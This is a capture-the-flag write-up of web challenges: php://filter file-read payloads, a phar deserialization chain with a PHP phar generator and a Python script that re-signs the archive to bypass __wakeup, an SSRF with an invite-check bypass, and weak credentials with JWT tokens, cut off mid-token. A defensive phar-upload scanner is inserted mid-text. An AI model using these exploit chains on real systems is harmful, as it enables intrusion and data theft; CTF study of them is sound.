
Title: The 3rd Guangdong College Students Network Offensive and Defensive Competition WP


1. WEB

1. Disappearing flag

Visiting the page returns Access Denied.

Use the Fakeip plugin to fake the source IP.

The page then prompts "File is Null".

Try adding a file parameter:

`?file=index.php` prompts `do not hack!`

Probably a filter chain.

Reference articles:

https://www.cnblogs.com/linuxsec/articles/12684259.html

https://blog.csdn.net/yuanxu8877/article/details/127607264

php://filter/convert.iconv succeeds:

/?file=php://filter/convert.iconv.utf-8.utf-16/resource=index.php

/?file=php://filter/convert.iconv.utf-8.utf-16/resource=/flag

2. unserialize_web

First check for common backup files: robots.txt, www.zip, .git, .svn, www.tar.gz.

A backup file, www.tar.gz, is found.

Visit URL/www.tar.gz to download the backup.

The whole source is in there; the interesting files are upload.php and download.php.

A similar challenge can be found on CSDN:

https://blog.csdn.net/m0_70819573/article/details/129506508

https://blog.csdn.net/2301_79708753/article/details/135873948

https://www.bilibili.com/read/cv21572905/

Opening the challenge link shows only an upload form, and there is nothing more to do from there. Isn't this supposed to be about deserialization?

So the guess is that it combines file upload with deserialization.

Searching confirms it is phar deserialization: deserialization triggered by including a file that was uploaded.

    } else {
        $extensions = array('gif', 'jpg', 'png');
        $temp = explode('.', $_FILES['file']['name']);
        $fileExtension = end($temp);
        $fileSizeCheck = $_FILES['file']['size'];
        $isExtensionAllowed = in_array($fileExtension, $extensions) ? true : false;
        if ($fileSizeCheck && $isExtensionAllowed) {
            $fileContent = file_get_contents($_FILES['file']['tmp_name']);
            // content check: reject anything that contains a phar stub
            $haltCompilerCheck = strpos($fileContent, '__HALT_COMPILER();');
            if (gettype($haltCompilerCheck) === 'integer') {
                echo 'phar';
                // ... (rest of upload.php omitted)
            }
        }
    }

From this code in upload.php we can see that only gif, jpg and png images can be uploaded, and a content check is performed: the file must not contain the string "__HALT_COMPILER();".

So we need to compress the generated phar file into an archive to bypass the check.

class File {
    public $val1;
    public $val2;
    public $val3;

    public function __construct() {
        $this->val1 = 'val1';
        $this->val2 = 'val2';
    }

    public function __destruct() {
        if ($this->val1 === 'file' && $this->val2 === 'exists') {
            if (preg_match('/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/', $this->val3)) {
                eval($this->val3);
            } else {
                echo 'Access Denied';
            }
        }
    }

    public function __access() {
        $Var = 'Access Denied';
        echo $Var;
    }

    public function __wakeup() {
        $this->val1 = 'exists';
        $this->val2 = 'file';
        echo 'file exists';
    }
}

From the code in download.php we can see that this is a regular deserialization target. The __destruct() magic method contains an eval() call that can execute code, so there is a command execution vulnerability. The if statement in __destruct() first checks whether $val1 equals 'file' and whether $val2 equals 'exists'.

Then the following code:

if (preg_match('/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/', $this->val3)) {
    eval($this->val3);

This is a PHP conditional that checks whether a string matches a specific pattern. If it matches, eval() runs the code in the string.

Let's look at this regular expression:

/^\s*system\s*\(\s*\'cat\s+\/[^;]*\'\s*\);\s*$/

^ and $ anchor the beginning and end of the string, so the whole string must match the pattern.

\s* matches zero or more whitespace characters.

system matches the literal text system.

\( and \) match literal left and right parentheses.

\s* matches zero or more whitespace characters.

'cat\s+/[^;]*' matches a single-quoted file path that starts with cat, where:

' matches a single quote.

cat matches the literal text cat.

\s+ matches one or more whitespace characters.

/ matches a literal slash.

[^;]* matches zero or more characters other than a semicolon.

' matches a single quote.

\s* matches zero or more whitespace characters.

; matches a semicolon.

In other words, this regular expression checks that the string begins with system('cat, is followed by a file path, and ends with ');

So we can set $val3 to

system('cat /flag');

to get the flag.

If the content of $this->val3 matches this pattern, eval($this->val3); is executed, which means the code in $this->val3 runs. This is a security risk because it allows arbitrary code execution and can lead to vulnerabilities such as code injection.

Visualize regular expressions: https://wangwl.net/static/projects/visualRegex/#

Then pay attention to this: the __wakeup() magic method needs to be bypassed:

public function __wakeup() {
    $this->val1 = 'exists';
    $this->val2 = 'file';
    echo 'file exists';
}

It forces $val1 to 'exists' and $val2 to 'file', so the if check fails when __destruct() is triggered later; hence __wakeup() must be bypassed.

That is, CVE-2016-7124 is needed. It affects:

PHP5 < 5.6.25

PHP7 < 7.0.10

Triggering it is very simple: when the number of object properties declared in the serialized string is greater than the real number of properties, __wakeup() is skipped.

So next we need to construct a phar file, upload it, and get it deserialized so that our code executes.

Compressing the archive (zip/gzip) bypasses the phar detection at upload, and the phar:// pseudo-protocol decompresses it again on access. During that access, file_get_contents() triggers deserialization of the phar metadata and the eval() runs.

Phar file generation code:

<?php
ini_set('phar.readonly', 'Off');

class File
{
    public $val1;
    public $val2;
    public $val3;

    public function __construct()
    {
        $this->val1 = 'file';
        $this->val2 = 'exists';
        $this->val3 = "system('cat /flag');";
    }
}

$a = new File();
$phar = new Phar('aa3.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->setMetadata($a);          // the File object is serialized into the manifest metadata
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();

Run the code to generate the phar file:

php phar.php

Opening it in 010 Editor shows that the contents of the phar file are serialized.

But an error is reported when uploading and accessing it:

Warning: file_get_contents(phar://./upload/fuck.jpg): failed to open stream: phar '/var/www/html/upload/fuck.jpg' SHA1 signature could not be verified: broken signature in

The problem is that although we can modify the phar file in 010 Editor to bypass the __wakeup() magic method, the archive is signed, so the signature has to be repaired.

Fix it with a script. A phar consists of the data, the data signature (20 bytes for SHA1) and the signature format (8 bytes).

import gzip
from hashlib import sha1

with open(r'D:\Downlaods_1\ANfang_CTF\Webbbbbb\aa3.phar', 'rb') as file:
    f = file.read()

s = f[:-28]                          # data to be signed (everything before the 28-byte trailer)
s = s.replace(b'3:{', b'4:{')        # bump the property count to bypass __wakeup
h = f[-8:]                           # signature type + GBMB magic
newf = s + sha1(s).digest() + h      # data + signature + (type + GBMB)
# print(newf)
newf = gzip.compress(newf)           # gzip-compress the phar
with open(r'D:\Downlaods_1\ANfang_CTF\Webbbbbb\fuck3.png', 'wb') as file:  # change the file suffix
    file.write(newf)
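The two weaknesses this challenge relies on, a content check that only looks at the raw upload bytes and a signature trailer that an attacker can simply recompute, are what a defender would want to check for. The following is an added example, not the challenge's or the write-up's own code: it unwraps gzip and zip containers before inspecting, parses the phar manifest far enough to see whether the metadata carries a serialized object (the field that gets unserialized on access), and verifies the signature trailer (digest, 4-byte algorithm id, "GBMB"). The build_sample_phar() fixture is constructed here by hand after the phar layout in the PHP manual, not written by PHP, and all sample values are made up.

```python
import gzip
import hashlib
import io
import re
import struct
import zipfile
import zlib

HALT = b"__HALT_COMPILER();"
# phar signature flags (PHP manual): algorithm id -> (hashlib name, digest length)
SIG_ALGOS = {0x0001: ("md5", 16), 0x0002: ("sha1", 20),
             0x0004: ("sha256", 32), 0x0008: ("sha512", 64)}


def unwrap(blob, label="raw"):
    """Yield (label, payload) for blob and anything it wraps. A content check on the
    raw upload misses a phar that was gzip- or zip-compressed before upload, because
    phar:// transparently decompresses both, so the check has to look inside."""
    if blob[:2] == b"\x1f\x8b":                      # gzip magic
        yield from unwrap(gzip.decompress(blob), label + ">gzip")
    elif blob[:4] == b"PK\x03\x04":                   # zip local-file header
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for name in zf.namelist():
                yield from unwrap(zf.read(name), f"{label}>zip:{name}")
    else:
        yield label, blob


def inspect_phar(data):
    """Parse the parts of a phar a gatekeeper cares about: the manifest metadata
    (where a serialized object would live) and the signature trailer."""
    idx = data.find(HALT)
    if idx < 0:
        return {"is_phar": False}
    pos = idx + len(HALT)
    # PHP accepts optional blanks, a closing tag and one newline after the halt token
    while data[pos:pos + 1] in (b" ", b"\t"):
        pos += 1
    if data[pos:pos + 2] == b"?>":
        pos += 2
    if data[pos:pos + 2] == b"\r\n":
        pos += 2
    elif data[pos:pos + 1] == b"\n":
        pos += 1
    # manifest header: manifest length, file count, API version, flags, alias length
    _, num_files, _, _, alias_len = struct.unpack_from("<IIHII", data, pos)
    pos += 18 + alias_len
    (meta_len,) = struct.unpack_from("<I", data, pos)
    metadata = data[pos + 4:pos + 4 + meta_len]
    report = {"is_phar": True, "files": num_files, "metadata": metadata,
              # serialized PHP objects start with O:<len>:"<class>":
              "metadata_has_object": re.search(rb'O:\d+:"', metadata) is not None}
    # trailer: <digest><4-byte LE algorithm id><"GBMB">; the digest covers all preceding bytes
    if data[-4:] != b"GBMB":
        report["signature"] = "missing"
        return report
    (algo_id,) = struct.unpack("<I", data[-8:-4])
    if algo_id not in SIG_ALGOS:
        report["signature"] = "unknown-algorithm"
        return report
    name, size = SIG_ALGOS[algo_id]
    signed, digest = data[:-(8 + size)], data[-(8 + size):-8]
    report["signature"] = "valid" if hashlib.new(name, signed).digest() == digest else "broken"
    return report


def scan_upload(blob):
    """Report on every phar found in an upload, including ones hidden under compression."""
    return [dict(inspect_phar(payload), container=label) for label, payload in unwrap(blob)]


def build_sample_phar(metadata, sign=True):
    """Constructed test fixture laid out by hand after the phar format description in
    the PHP manual (not an archive written by PHP): stub, one file, given metadata."""
    stub = b"<?php __HALT_COMPILER(); ?>\r\n"
    name, content = b"test.txt", b"test"
    # file entry: name length, name, uncompressed size, timestamp, compressed size,
    # CRC32, flags, metadata length
    entry = (struct.pack("<I", len(name)) + name +
             struct.pack("<IIIIII", len(content), 0, len(content),
                         zlib.crc32(content) & 0xFFFFFFFF, 0, 0))
    body = (struct.pack("<IHII", 1, 0x1100, 0x10000, 0) +     # 1 file, API 1.1.0, signed flag, no alias
            struct.pack("<I", len(metadata)) + metadata + entry)
    data = stub + struct.pack("<I", len(body)) + body + content
    if sign:
        data += hashlib.sha1(data).digest() + struct.pack("<I", 0x0002) + b"GBMB"
    return data


def demo():
    """Scan a gzip-wrapped sample whose metadata holds a serialized object."""
    return scan_upload(gzip.compress(build_sample_phar(b'O:4:"File":3:{}')))


if __name__ == "__main__":
    for r in demo():
        print(r["container"], r["is_phar"], r["metadata_has_object"], r["signature"])
```

The check worth taking away: a naive strpos() for the stub passes a gzip-wrapped phar straight through, while a scanner that decompresses first still finds the stub, the serialized object in the metadata, and whether the trailer digest matches the bytes in front of it.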

Then upload the png image.

Send the POST parameter to download.php, using the phar:// pseudo-protocol to read the phar file and trigger deserialization:

file=phar://./upload/fuck3.png

Finally we get the flag:

669b01045da0456ea2a2861ce57dd537

3. mypdf

Clicking through the functions found nothing. In the F12 page source there is www.zip.

Download the source code: it is TCPDF v6.3.2.

Look at the registration function. Registering directly shows an error, so look at the registration logic in html/api.php.

Follow up to qInternal.

It will visit http://localhost:8082/invites

Then go to pdf/internal.py.

app.run(host='127.0.0.1', port=8082): a Python service listens on local port 8082.

Local debugging got this far and found that if(myJson['invite'] in open('invites.txt').read().split('\n')): cannot be avoided.

Then Google 'ctf' TCPDF invites.

Found:

https://cloud.tencent.com/developer/article/2069757

https://r0.haxors.org/posts?id=15

https://b6a.black/posts/2021-05-22-3kctf/#ppaste-web-498-points

Reference: https://r0.haxors.org/posts?id=15

invite:-3.3e99999999999999999999999999999999999999999

Then use the SSRF against the intranet.

Like the referenced WP, I tried several times but could not hit it. There is no request to the external network, so I can't guess the network layout.

Go to the source code and follow the original challenge's WP to find the SSRF logic.

Comparison with the original challenge: gopher is allowed.

So I tried gopher, and after testing for a long time it still did not work.

Finally, guessed the problem might be the cookie: either the logged-in user's or a previous user's cookie.

Register admintest1 directly, fire the SSRF at a teammate's account (admintest55), access action:admin, and successfully escalate to admin.

4. hackme

0 solves. After the game a senior worked it out while the environment was still up; reproduced here.

Two users have weak passwords; log in to get two tokens:

admin;123456

test;123456

token_test='eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoidGVzdCIsImlwIjoiMTcyLjIwLjI0MC4zMiJ9.A9CrtyzLavHQif9VRIHJN1kSjLefzcKPArv3Eo96EbSlD5gzRU78QGiFkdtW_YxQgYc7z82PqH1BQGWMf5CLBfYSQNB6V9HV7FyZJUpzZt2b-irXitYFhW2qQJr0i_yrJA'

token_admin='eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpcCI6IjE3Mi4yMC4yNDAuMzIifQ.DDtMChPMQtBA_2_wJxLPO_6g5dTaM7stY2Knngol6qAeaWh4Y8EjY6ndBLuEMhXYyecpiLFXZxEPqkV_GW3rGReg7L
